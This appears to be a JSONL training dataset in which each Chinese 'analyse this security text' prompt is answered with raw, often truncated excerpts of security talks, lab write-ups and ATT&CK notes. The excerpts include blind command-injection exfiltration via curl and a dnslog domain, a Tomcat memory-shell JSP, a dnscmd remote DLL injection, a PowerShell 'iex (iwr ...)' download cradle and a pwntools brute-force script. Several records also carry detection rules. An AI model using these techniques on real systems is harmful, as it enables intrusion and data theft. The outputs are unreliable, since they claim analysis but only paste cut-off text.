{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAddHandler example-handler .sum application/x-httpd-twf application/x-httpd-twf   mod_twf.so 0x00 0x01   cs:_Z15ub_error_handleP11request_rec_ptr // cs:_Z17mobileapp_handlerP11request_rec_ptr //mobileapp cs:_Z16webstore_handlerP11request_rec_ptr //webstore cs:_Z12nexttwf_mainP11request_rec_ptr //nexttwf_main cs:_Z14twf_auth_checkP11request_rec_ptr //twf_auth_check sub_152E90 sub_1533B0    application/x-httpd-twf 0x02 twf_auth_check    url=req.url v3 = *(const char **)(req + 336);  find / -name \"*.log\" -type f | xargs grep -s \"MOD_TWF\"  0x03 /hislog/20210417.log // /var/log/webui/20210420.log // tail -200f /var/log/webui/20210420.log tail -f /var/log/webui/20210420.log | strings  tail -1000f /var/log/webui/20210420.log | strings | grep \"MOD_TWF\"  /por/%0A%0Dlogin_auth.csp?abc=1  /por/login_auth.csp?abc=1%0A%0D  0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Secret Location - Base Category: HW ## Description > \"Welcome back AGENT. It seems like you've got a marvelous lead that perhaps gives a clue about where you should head to next. Visit the lab, and talk to that Dr. Klostermann, or is it Cloysterman?, he will know how to decrypt the device.. you would think\". ... Dr Klostermann: \"Welcome to the technical department AGENT, Im Dr. Klostermann, and this is my assistant, Konstantin. Lets not waste any time, is that the device that youre holding in your hand? Konstantin, start the basic procedure.\" > > Challenge: Electronics Research Lab (hw) > > Welcome back AGENT. It seems like you got a lead that perhaps gives a clue about where the next journey on your quest goes. Visit the lab, and talk to Dr. Klostermann, he will know how to decrypt the device Note: If you solved the challenge before but could not submit the flag, please try again, we had the wrong flag in our database. A C file (and a `pico.uf2` file) were attached. <details> <summary>Click to expand</summary> ```c #include <stdbool.h> #include \"hardware/gpio.h\" #include \"hardware/structs/sio.h\" #include \"pico/stdlib.h\" int main(void) { for (int i = 0; i < 8; i++) { gpio_init(i); gpio_set_dir(i, GPIO_OUT); } gpio_put_all(0); for (;;) { gpio_set_mask(67); gpio_clr_mask(0); sleep_us(100); gpio_set_mask(20); gpio_clr_mask(3); sleep_us(100); gpio_set_mask(2); gpio_clr_mask(16); sleep_us(100); gpio_set_mask(57); gpio_clr_mask(4); sleep_us(100); gpio_set_mask(0); gpio_clr_mask(25); sleep_us(100); gpio_set_mask(5); gpio_clr_mask(2); sleep_us(100); gpio_set_mask(18); gpio_clr_mask(65); sleep_us(100); gpio_set_mask(1); gpio_clr_mask(2); sleep_us(100); gpio_set_mask(64); gpio_clr_mask(17); sleep_us(100); gpio_set_mask(2); gpio_clr_mask(0); sleep_us(100); gpio_set_mask(1); gpio_clr_mask(6); sleep_us(100); gpio_set_mask(18); gpio_clr_mask(65); sleep_us(100); gpio_set_mask(1); gpio_clr_mask(0); sleep_us(100); gpio_set_mask(4); gpio_clr_mask(2); sleep_us(100); gpio_set_mask(0)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n命令执行无回显的判断方法及 dnslog 相关例题 一命令执行判断 命令执行可能会存在命令执行完没有回显首先要判断命令 是否有执行可以通过三种方式来判断延时HTTP 请求 DNS 请求 1 延时 无延时无回显 有延时无回显 通过是否延时来判断该条命令是否有执行有延时则代表命 令有执行sleep 3表示延时 3 秒 2 HTTP 请求目标机通过向公网可通信的机子发起 http 请求而这个公网可通信的机子是我们可控的则当该公 网机子收到 http 请求就代表命令有执行 例我们在公网机上可以通过nc -lv 端口号来监听该端口 当目标机curl 公网机 ip:端口号的时候公网机的该端口可 以发现有 http 请求过来注意ping 命令不产生 http 请求 公网机进行 8000 端口监听 目标机向公网机的 8000 端口发起 http 请求 公网机监听中的 8000 端口收到 http 请求 将curl 公网机 ip:端口号命令拼接到地址中进行命令执行 公网机监听中的 8000 端口收到 http 请求说明命令执行成功 3 DNS 请求如果请求的目标不是 ip 地址而 是域名那么域名最终还要转化成 ip 地址就 肯定要做一次域名解析请求那么假设我有个 可控的二级域名那么它发出三级域名解析的 时候我这边是能够拿到它的域名解析请求的 这就相当于可以配合 DNS 请求进行命令执行 的判断这一般就被称为 dnslog要通过 dns 请求即可通过 ping 命令也能通过 curl 命令 只要对域名进行访问让域名服务器进行域名 解析就可实现 例大家可以去 ceye.io 注册个账号注册完后会给一个域 名如果有域名解析请求会有记录 我这边得到的域名是 wzrtbq.ceye.io如果我去访问 1111111. wzrtbq.ceye.io那么就会记录下来这个域名解析请求 访问 1111111. wzrtbq.ceye.io 域名解析请求被记录 将访问域名拼接到地址中 域名解析请求被记录 二利用 1直接写入或外部下载 shell 执行命令 例通过命令执行直接得到文件内容 生成 1.txt 拷贝 访问 1.txt 将=cp where_is_flag.php 1.txt做为参数传递给 ping然后 就执行了 cp where_is_flag.php 1.txt这个命令生成 1.txt 文件在去访问 1.txt就能得到 1.txt 的内容也就是 where_is_flag.php 的内容最后找到 flag 2通过 http 请求/dns 请求等方式带出数据 例通过 dnslog 带出数据 注意1命令执行时要避免空格空格会导致空格后面的 命令执行不到2将读取的文件命令用``包含起来3拼 接的域名有长度限制 读取 where_is_flag.php`cat where_is_flag.php` 替换读取文件中的空格`cat where_is_flag.php|sed s/[[:space:]]//` 拼接域名`cat where_is_flag.php|sed s/[[:space:]]//`.wzrtbq.ceye.io 利用 dnslog 得到文件内容即得到了 flag 文件地址 获取 flag 文件内容 获取到 flag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPen-testing Wi-Fi Defcon 2007 Aaron Peterson \"What you talking about, Willis? We're talking about   Pen-testing Wi-Fi with a new wireless auditing tool: **Wicrawl**  Who am I  Current state of Wi-Fi scanning  Wi-Fi Penetration testing  How Wicrawl can help  How it works  Use cases and examples  Screenshots  Demo!!  LiveCD software handout  Wi-finding robot? Who am I? Aaron Peterson (Aaron@MidnightResearch.com, Aaron@AlphaDefense.com)  Project manager and Developer for wicrawl  Founder, Midnight Research Laboratories (MRL)  Co-Founder, Consultant with Alpha Defense  Network Security Incident Response Team at Harvard University UIS NOC  Network Security by day, Pen-tester by night Who is that? Midnight Research Labs is a small security research group (San Francisco, Boston, other). With a focus on security and novel computing, MRL has monthly meetings to discuss and stimulate new development on sponsored projects. Come on out! http://www.MidnightResearch.com A Network Security Consulting firm based in Boston, MA that specializes in Network and Web Application Penetration testing http://www.AlphaDefense.com Standard disclosure None of the views, statements or opinions expressed in this presentation reflect in any way the opinions of my employer. Current state of wi-fi scanning (old and busted) Wi-Fi is nearly ubiquitous, but...  More and more layers of security means varying levels of access (and varying levels of usefulness) We don't really care about just finding a large number of useless Access Points anymore because:  Just knowing an access point exists doesnt tell us much  Manual configuration and checks are tedious and take too much time (and get too few useful results)  Especially for large numbers  That and I'm pretty lazy The inspiration for Wicrawl AP Information gathering  Having WEP no longer means we cant get on an access point (WEP is dead)  An open AP no longer means we can   Much more information to gather after association WEP: You can put lipstick on ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXMPP Stanza Smuggling or How I Hacked Zoom Ivan Fratric, Google Project Zero BlackHat USA 2022 About the speaker Ivan Fratric  Google Project Zero since 2016  Previously: Google Security Team, academia (Uni ZG)  Publishing security research for >>10 years  Author: WinAFL, Domato, TinyInst, Jackalope,   Twitter: @ifsecure XMPP <?xml version='1.0' ?><stream:stream to='xmpp.zoom.us' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' xml:lang='en' version='2.0'> </stream:stream> <message from='zt5aygods8mzcclqhpn-ag@xmpp.zoom.us/ZoomChat_pc' to='btdwxa1fssobpko9x_-j_a@xmpp.zoom.us' id='{B0D067FD-F47A-47DF-9305-4C2B47489F06}' type='chat'><body>test message</body><thread>gloox{F096A899-64D6-4B36-9D65-11BAD59E3D7D}</t hread><active xmlns='http://jabber.org/protocol/chatstates'/><zmext expire_t='1720173136000' t='1657014736331'><from n='Ivan Vctm' res='ZoomChat_pc'/><msg_type>0</msg_type><to/><visible>true</visible ><msg_feature>4</msg_feature></zmext></message> <iq from='btdwxa1fssobpko9x_-j_a@xmpp.zoom.us/ZoomChat_pc' to='btdwxa1fssobpko9x_-j_a@xmpp.zoom.us/ZoomChat_pc' id='{8D2152A9-422E-4510-86A3-F4B510D93AB6}' type='result'/> Stanza Stanza XMPP Sent: <message xmlns='jabber:client' to='zt5aygods8mzcclqhpn-ag@xmpp.zoom.us' id='{...}' type= 'chat' from='btdwxa1fssobpko9x_-j_a@xmpp.zoom.us/ZoomChat_pc'><body>hello</body><thread> gloox{...}</thread><active xmlns='http://jabber.org/protocol/chatstates'/><zmext> <msg_type>0</msg_type><from n='Ivan Attckr' res='ZoomChat_pc'/><to/><visible>true </visible><msg_feature>4</msg_feature></zmext></message> Received: <message from='btdwxa1fssobpko9x_-j_a@xmpp.zoom.us/ZoomChat_pc' to= 'zt5aygods8mzcclqhpn-ag@xmpp.zoom.us' id='{...}' type='chat'><body>hello</body> <thread>gloox{...}</thread><active xmlns='http://jabber.org/protocol/chatstates'/> <zmext expire_t='1720185046000' t='1657026646132'><from n='Ivan Attckr' res='ZoomChat_pc'/><msg_type>0</msg_type><to/><visible>true</visible><msg_feature>4 </msg_feature></zme", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlistener Listener的介绍 1. Listener 的分类 tomcat 中 Listener 分为两类 org.apache.catalina.LifecycleListener 以及 java 原生的 Java.util.EvenListener 其中 LifecycleListener 是为了监听 tomcat 的各个容器的生命周 期的比如 StandardEngine  StandardHost  StandardContext  StandardWrapper 这些容 器的启动关闭等等这些监听处在的位置为容器启动此时 servlet 未建立 request 请求未 创建不适合用于创建内存马所以此处使用 Java.util.EvenListener 的监听器 2. Java.util.EvenListener 监听器 在 tomcat 中有较多的接口都继承自 EventListener 其中这些接口都有自己的生命周期在不同的时段触发和销毁以 ServletRequestListener 举 例这个 Listener 用于监听 servletrequest 的创建和销毁所以他的生命周期为 servletRequest 创建时初始化 servletRequest 销毁时销毁接下来自己实现这个 servletRequestListener 接口看看他对 servletRequest 的监听 首先自定义一个 demoListener 类实现 ServletRequestListener 接口其中在 servletRequest 对象创建的时候往 request 和 ServletContext 中写入两个属性然后在 servlet 中读取这个两个属性 在 servlet 中获取这两个属性值并且打印 注册 Listener 之后访问 servlet 查看效果 可以看到在 servletRequest 对象创建的时候成功添加了两个属性在 servlet 中也成功获取了 该属性 3. 其余监听器的作用 参考文章Listener监听器生命周期 addListener 方法的实现 addListener 方法属于方法的重载根据不同的参数列表来绝对调用哪一个 java.org.apache.catalina.core.ApplicationContext#addListener(String className) 传递一个类名然后会将类转换为 EventListener 类型之后再自动调用 addListener(T t) 在匹配 t 是否为几个默认 listener 的一种之后会通过 context.addApplicationEventListener 添加监听器 注入Listener内存马 <%@ page import=\"java.text.DateFormat\" %> <%@ page import=\"java.text.SimpleDateFormat\" %> <%@ page import=\"java.util.Date\" %> <%@ page import=\"java.util.EventListener\" %> <%@ page import=\"java.io.InputStream\" %> <%@ page import=\"java.io.ByteArrayOutputStream\" %> <%@ page import=\"java.io.IOException\" %> <%@ page import=\"java.lang.reflect.Field\" %> <%@ page import=\"org.apache.catalina.connector.Request\" %> <%@ page import=\"org.apache.catalina.core.StandardContext\" %> <html> <head> <meta charset=\"UTF-8\"> </head> <body> <% DateFormat dateFormat = new SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss\"); String dateStr = dateFormat.format(new Date()); %> <%= dateStr %> <% class demoListener_ implements ServletRequestListener { /** * 在对象销毁的过程中获取参数然后执行命令 * @param sre Information about the request * @throws IOException */ @Override public ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Real-Life Story of the First Mainframe Container Breakout CROSSOVER EPISODE @IanColdwater @bigendiansmalls  Ian is a leading expert on containers and container security.  Chad is the same, but for mainframes and mainframe security. MINNESNOWTA @IanColdwater @bigendiansmalls DEEP MAGIC @IanColdwater @bigendiansmalls HOW IT ALL BEGAN @IanColdwater @bigendiansmalls LATER THAT WEEK @IanColdwater @bigendiansmalls COMMON THREADS @IanColdwater @bigendiansmalls WINTER PROJECT @IanColdwater @bigendiansmalls THE LIMIT DOES EXIST @IanColdwater @bigendiansmalls FORMAL STATEMENT FROM IBM @IanColdwater @bigendiansmalls CONTAINERS ON A MAINFRAME?! Containers? On my mainframe? THIS IS A MAINFRAME @IanColdwater @bigendiansmalls THIS IS ALSO A MAINFRAME @IanColdwater @bigendiansmalls ZCX ARCHITECTURE @IanColdwater @bigendiansmalls WHAT IS A CONTAINER? @IanColdwater @bigendiansmalls HOW DID WE BREAK IT? @IanColdwater @bigendiansmalls ASSEMBLING LAYERS @IanColdwater @bigendiansmalls SPACE CAMP @IanColdwater @bigendiansmalls GETTING TRAINED UP @IanColdwater @bigendiansmalls https://evilmainframe.com GETTING TRAINED UP @IanColdwater @bigendiansmalls https://securekubernetes.com TAKING OFF @IanColdwater @bigendiansmalls ZCX PROVISIONING @IanColdwater @bigendiansmalls FIRST LOOK @IanColdwater @bigendiansmalls EXOTIC HACKER TOOLS @IanColdwater @bigendiansmalls JOB LOG @IanColdwater @bigendiansmalls VISIBILITY CLOAK @IanColdwater @bigendiansmalls PATCHING THE BINARY @IanColdwater @bigendiansmalls ECHO PRIVATEKEY.PEM @IanColdwater @bigendiansmalls OPE, KEY IN THE LOGS @IanColdwater @bigendiansmalls CONTAINER SETUP @IanColdwater @bigendiansmalls WARNING LABEL @IanColdwater @bigendiansmalls DOCKER IN DOCKER @IanColdwater @bigendiansmalls ZCX DOCKER OUT OF DOCKER @IanColdwater @bigendiansmalls ZCXAUTHPLUGIN ERRORS @IanColdwater @bigendiansmalls CLI RESTRICTIONS @IanColdwater @bigendiansmalls  IS THIS PATTERN MATCHING? @IanColdwater @bigendiansmalls CONTAINERS ARE HARD @IanColdwater @bigendia", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLast mile authentication problem Exploiting the missing link in end-to-end secure communication Our team Thanh Bui Doctoral Candidate Aalto University Finland Sid Rao Doctoral Candidate Aalto University Finland Dr. Markku Antikainen Post-doc researcher University of Helsinki Finland Prof. Tuomas Aura Professor Aalto University Finland 2 Traditional network threat model  Server and user device are trusted  Software is trusted  Untrusted network:  man in the middle  E.g. web server and web browser  Crypto (TLS and web PKI) to protect communication 3 Server User device Client  Not all communication goes over the traditional network  Inter Process Communication  Multiple untrusted services run inside the user device We try to understand security of communication inside the computer Communication inside a computer - IPC 4 User device Frontend process Backend process Man in the Machine (MitMa)  MitMa attacker: Another user at home or at work, including guest  Attacker goal: Impersonate communication endpoints in IPC  Attack method:  Runs a malicious process in the background (no privilege escalation required)  Fast user switching, remote access (e.g. ssh, remote desktop) 5 Alices session Frontend process Backend process Guests session Malware This talk  We exploit last mile communication inside the computer  Structure  IPC and attack vectors  Case studies  Password managers  USB security tokens  Mitigation  Conclusion 6 This talk  We exploit last mile communication inside the computer  Structure  IPC and attack vectors  Case studies  Password managers  USB security tokens  Mitigation  Conclusion 7 Credentials and second authentication factors can be compromised from inside the computer zz Inter Process Communication 8 IPC methods  File system  Signal and semaphore  Network socket and Unix domain socket  Message queue  Anonymous pipe and named pipe  Shared memory  Clipboard  Remote Procedure Call (RPC)  USB (though not strictly an IPC method)  ... 9 Network sockets  Mainly", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1543-003-windows服务-Dnscmd.exe(白名单) ## 来自ATT&CK描述 作为持久性的一部分攻击者可能会创建或修改Windows服务以重复执行恶意负载当Windows启动时它会启动程序或称为服务的应用程序来执行后台系统功能Windows服务配置信息包括服务的可执行文件或恢复程序/命令的文件路径存储在 Windows 注册表中可以使用sc.exe和Reg等实用程序修改服务配置 攻击者可以通过使用系统实用程序与服务交互直接修改注册表或使用自定义工具与Windows API交互来安装新服务或修改现有服务攻击者可能会将服务配置为在启动时执行以便在系统上建立持久性 攻击者还可以通过使用来自相关操作系统或良性软件的服务名称或通过修改现有服务来结合伪装使检测分析更具挑战性修改现有服务可能会中断其功能或启用已禁用或不常用的服务 可以使用管理员权限创建服务但需要在SYSTEM权限下执行因此攻击者也可以使用服务将权限从管理员提升到 SYSTEM攻击者也可以通过服务执行直接启动服务 ## 测试案例 Dnscmd.exe用于管理DNS服务器的命令行界面此实用程序可用于编写批处理文件脚本以帮助自动化日常DNS管理任务或在网络上执行简单的无人值守设置和配置新DNS服务器 路径 ``` - C:\\Windows\\System32\\Dnscmd.exe - C:\\Windows\\SysWOW64\\Dnscmd.exe ``` 添加特制DLL作为DNS服务的插件 此命令必须由至少是DnsAdmins组成员的用户在DC上运行更多使用方法请参看[微软官方说明](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) ```bash dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\\\192.168.0.149\\dll\\wtf.dll ``` 用例远程向dns服务器注入dll 所需权限DNS管理员 操作系统Windows服务器 ## 检测日志 Windows 安全日志 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 这里参看Sigma官方规则 ```yml title: DNS ServerLevelPluginDll Install id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 related: - id: e61e8a88-59a9-451c-874e-70fcc9740d67 type: derived status: experimental description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 date: 2017/05/08 modified: 2021/09/12 author: Florian Roth tags: - attack.defense_evasion - attack.t1073 # an old one - attack.t1574.002 - attack.t1112 logsource: category: process_creation product: windows detection: dnsadmin: Image|endswith: '\\dnscmd.exe' CommandLine|contains|all: - '/config' - '/serverlevelplugindll' condition: dnsadmin falsepositives: - unknown level: high fields: - EventID - CommandLine - ParentCommandLine - Image - User - TargetObject ``` ## 参考推荐 MITRE-ATT&CK-T1543-003 <https://attack.mitre.org/techniques/T1543/003> Dnscmd.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRevoke-Obfuscation > PowerShell Obfuscation Detection Using Science Daniel Bohannon - @danielhbohannon Lee Holmes - @Lee_Holmes 0.0/00 > Whois 0.0/00 - MANDIANT Senior Applied Security Researcher - Invoke-Obfuscation, Invoke-CradleCrafter - Obfuscation, evasion and detection techniques - @danielhbohannon Title . @Speaker . Location %ProgramData:~0,1%%ProgramData:~9,2% /c echo OBFUSCATION_FTW! > Whois 0.0/00 - Lead security architect of Azure Management @ MS - Author of the Windows PowerShell Cookbook - Original member of PowerShell Development Team - @Lee_Holmes Title . @Speaker . Location iex (iwr bit.ly/e0Mw9w) 0.0/00 Title . @Speaker . Location Preparing Your Environment for Investigations  Logs (and retention) are your friend 1) enable 2) centralize 3) LOOK/MONITOR  Process Auditing AND Command Line Process Auditing 4688 FTW!  https://technet.microsoft.com/en-us/library/dn535776.aspx  SysInternals Sysmon is also a solid option  Real-time Process Monitoring  Uproot IDS - https://github.com/Invoke-IR/Uproot  PowerShell Module, ScriptBlock, and Transcription logging  https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/  https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html Launch Techniques  PowerShell Help is the best in the business Launch Techniques  powershell.exe called by cmd.exe  cmd.exe /c \"powershell -c Write-Host SUCCESS -Fore Green\" Launch Techniques  powershell.exe called by cmd.exe  cmd.exe /c \"powershell -c Write-Host SUCCESS -Fore Green\"  cmd.exe /c \"echo Write-Host SUCCESS -Fore Green | powershell -\"  cmd.exe /c \"echo Write-Host SUCCESS -Fore Green | powershell IEX $input\" Launch Techniques  powershell.exe called by cmd.exe ..  cmd.exe /c \"echo Write-Host SUCCESS -Fore Green | powershell -\"  cmd.exe /c \"echo Write-Host SUCCESS -Fore Green | powershell IEX $input\" Launch Techniques  powershell.exe called by cmd.exe ..  cmd.exe /c \"echo Write-Host SUCCESS -Fore Green | powershell -\"  cmd.exe /c \"echo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsum === 计算文件的校验码和显示块数 ## 补充说明 **sum命令** 用于计算并显示指定文件的校验和与文件所占用的磁盘块数 ### 语法 ```shell sum(选项)(参数) ``` ### 选项 ```shell -r使用BSD的校验和算法块大小为1k -s使用system V的校验和算法块大小为512字节 ``` ### 参数 文件列表需要计算和与磁盘块数的文件列表 ### 实例 计算文件校验码 ```shell [root@localhost ~]# sum insert.sql 00827 12 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Djinn3 > https://download.vulnhub.com/djinn/djinn3.tar.gz 靶场IP`192.168.32.232` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p 1-65535 -sV 192.168.32.232 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 10:33 EDT Nmap scan report for 192.168.32.232 Host is up (0.00050s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http lighttpd 1.4.45 5000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.9) 31337/tcp open Elite? ``` 浏览器访问80端口 ![image-20220911223546069](../../.gitbook/assets/image-20220911223546069.png) 浏览器访问5000端口 ![image-20220911223609054](../../.gitbook/assets/image-20220911223609054.png) 此端口托管一个 python Web 服务器我们看到一张带有编号ID标题状态和链接的票证列表点击链接重定向到`http://djinn.box:5000/?id=<ID>` 浏览不同的票证可以发现以下用户名的潜在存在 - jack - jason - david - freddy 访问31337端口看起来需要正确账号和密码 ``` (rootkali)-[/tmp] # nc 192.168.32.232 31337 username> anonymous password> 123 authentication failed ``` brute.py ``` #!/usr/bin/env python3 from pwn import * import sys host, port = '192.168.32.232', 31337 # https://raw.githubusercontent.com/shipcod3/Piata-Common-Usernames-and-Passwords/master/userpass.txt with open('userpass.txt') as f: data = f.readlines() for creds in data: (username, password) = creds.split(' ') username = username.strip() password = password.strip() s = remote(host, port, level='error') s.recvuntil('username> ') s.sendline(username) s.recvuntil('password> ') s.sendline(password) msg = s.recvline() if b'authentication failed' not in msg: print(\"[+] Valid credentials found: {}:{}\".format(username, password)) sys.exit(0) s.close() ``` 发现账号密码:`guest:guest` ``` (rootkali)-[/tmp] # python3 brute.py /tmp/brute.py:20: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes s.recvuntil('username> ') /tmp/brute.py:21: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes s.sendline(username) /tmp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1222-002-linux-文件权限修改 ## 来自ATT&CK的描述 文件权限通常有文件的所有者指定的自主访问控制列表(DACL)管理文件DACL实现可能因不同系统而异但通常明确指定那些用户/组可以执行那些操作例如读取写入执行等 攻击者可以修改文件权限/属性来逃避预定的DACL策略修改可能包括更改特定的访问权限这可能需要获取文件的所有权或提升权限例如administer/root具体取决于文件的现有权限特定文件修改可能是许多技术的必需步骤例如通过辅助功能登陆脚本建立持久性或者污染/劫持其他工具的配置文件等 ## 测试案例 chmod 766 abc.txt chmod u+x abc.txt #abc.txt文件属主权限具有执行权限 chmod o-x abc.txt #取消其他用户对abc.txt的执行权限 chown runoob:runoobgroup abc.txt 将文件 abc.txt 的拥有者设为 runoob群体的使用者 runoobgroup ## 检测日志 linux audit日志 值得注意的是Ubuntu默认情况下没有audit需要下载安装并配置相关策略 bash历史记录 ## 测试复现 icbc@icbc:~$ sudo chmod 766 abc.txt ...... icbc@icbc:~$ sudo chmod u+x abc.txt ## 测试留痕 基于audit日志 暂无 基于历史记录 icbc@icbc:~$ histroy 646 sudo chmod 766 abc.txt 647 sudo chmod u+x abc.txt ## 检测规则/思路 ### splunk规则 #### 基于audit日志 index=linux sourcetype=linux_audit syscall=90 OR syscall=91 OR sycall=268 | table msg,syscall,syscall_name,success,auid,comm,exe #### 基于bash历史记录 index=linux sourcetype=\"bash_history\" bash_command=\"chmod *\" OR bash_command=\"chown*\" | table host,user_name,bash_command ### 建议 值的注意的是你需要创建一个白名单进行数据降噪否则你可能会在无休止的去误报的路上越走越远 ## 参考推荐 MITRE-ATT&CK-T1222-002 <https://attack.mitre.org/techniques/T1222/002/> Audit配置手册 <https://www.cnblogs.com/bldly1989/p/7204358.html> DACL自主访问控制列表 <https://baike.baidu.com/item/DACL/10681774?fr=aladdin> linux下chmod命令用法 <https://blog.csdn.net/shinehoo/article/details/5821354> linux下chown命令用法 <https://www.runoob.com/linux/linux-comm-chown.html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对 PHP 的网站主要存在下面几种攻击方式: 1命令注入(Command Injection) 2eval 注入(Eval Injection) 3客户端脚本攻击(Script Insertion) 4跨网站脚本攻击(Cross Site Scripting, XSS) 5SQL 注入攻击(SQL injection) 6跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7Session 会话劫持(Session Hijacking) 8Session 固定攻击(Session Fixation) 9HTTP 响应拆分攻击(HTTP Response Splitting) 10文件上传漏洞(File Upload Attack) 11目录穿越漏洞(Directory Traversal) 12远程文件包含攻击(Remote Inclusion) 13动态函数注入攻击(Dynamic Variable Evaluation) 14URL 攻击(URL attack) 15表单提交欺骗攻击(Spoofed Form Submissions) 16HTTP 请求欺骗攻击(Spoofed HTTP Requests) 以后的每期连载会逐个介绍这些漏洞的原理和防御方法 几个重要的 php.ini 选项 Register Globals php>=4.2.0php.ini 的 register_globals 选项的默认值预设为 Off当 register_globals 的设定 为 On 时程序可以接收来自服务器的各种环境变量包括表单提交的变量而且由于 PHP 不必事先初始化变量的值从而导致很大的安全隐患 例 1: //check_admin()用于检查当前用户权限如果是 admin 设置$is_admin 变量为 true然后下面 判断此变量是否为 true然后执行管理的一些操作 //ex1.php <?php if (check_admin()) { $is_admin = true; } if ($is_admin) { do_something(); } ?> 这一段代码没有将$is_admin 事先初始化为 Flase如果 register_globals 为 On那么我们直 接提交 http://www.sectop.com/ex1.php?is_admin=true,就可以绕过 check_admin()的验证 例 2: //ex2.php <?php if (isset($_SESSION[\"username\"])) { do_something(); } else { echo \"您尚未登录!\"; } ?> 当 register_globals=On 时  我 们 提 交 http://www.sectop.com/ex2.php?_SESSION[username]=dodo就具有了此用户的权限 所以不管 register_globals 为什么我们都要记住对于任何传输的数据要经过仔细验证变 量要初始化 safe_mode 安全模式PHP 用来限制文档的存取限制环境变量的存取控制外部程序的执行启用 安全模式必须设置 php.ini 中的 safe_mode = On 1限制文件存取 safe_mode_include_dir = \"/path1:/path2:/path3\" 不同的文件夹用冒号隔开 2限制环境变量的存取 safe_mode_allowed_env_vars = string 指定 PHP 程序可以改变的环境变量的前缀如:safe_mode_allowed_env_vars = PHP_ ,当这个 选项的值为空时那么 php 可以改变任何环境变量 safe_mode_protected_env_vars = string 用来指定 php 程序不可改变的环境变量的前缀 3限制外部程序的执行 safe_mode_exec_dir = string 此选项指定的文件夹路径影响 systemexecpopenpassthru不影响 shell_exec 和` ` disable_functions = string 不同的函数名称用逗号隔开此选项不受安全模式影响 magic quotes 用来让 php 程序的输入信息自动转义所有的单引号(')双引号(\")反斜杠(\\)和空字 符(NULL)都自动被加上反斜杠进行转义 magic_quotes_gpc = On 用来设置 magic quotes 为 On它会影响 HTTP 请求的数据(GET POSTCookies) 程序员也可以使用 addslashes 来转义提交的 HTTP 请求数据或者用 stripslash", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPopping shells with your cereal box Michael West T3h Ub3r K1tten Colin Campbell magicspacekiwi humans.txt Michael West magicspacekiwi Enjoys scanning long barcodes on the beach Professional internet tube filler \"Master of the web\" Barcodes are everywhere Barcodes are everywhere Barcode scanners are everywhere Barcodes usually decode to text Code 128 UPC Aztec PDF417 QR barcOwned 02626260 barcOwned Did you ever hear the tragedy of Darth Plagueis \"the wise\"? I thought not. It's not a story the Jedi would tell you. It's a Sith legend. Darth Plagueis was a Dark Lord of the Sith, so powerful and so wise he could use the Force to influence the midichlorians to create life... He had such a knowledge of the dark side that he could even keep the ones he cared about from dying. The dark side of the Force is a pathway to many abilities some consider to be unnatural. https://038000144158.pw/ Scanner soliloquy  Scanners are mostly the same  Most common (default) mode:  Act as HID keyboard  Type buffer key by key  What could we do if we could  Change the text on the fly?  Send arbitrary keystrokes?  Win + R? To scan, or not to scan... What could we do?* *with proper permission in the scope of a legal, sanctioned pentest It's not a bug!  Some symbologies add control chars  Code 128:  107 possible characters  0 - 95: portions of ASCII  96-106: control chars  Control chars trigger programming  Majority of scanners support this  Manufacturer specific FNC3 10111100010 Index: 96 Yes, it's in-band signaling What can programming do?  Exists for legacy systems  \"We use Cyberdyne to track and herd our cats.\"  \"It's too expensive to replace or modify.\"  \"Make it faster!\"  Real (fake) example No, not THAT type of cat... Herding cats Herding cats Barcoding cats Cursor Cursor Cursor Cursor + <tab> + F12 Scanning cats Scanning cats Programming is stupid simple  Specify criteria  All barcodes (no criteria)  Barcodes that start with 9 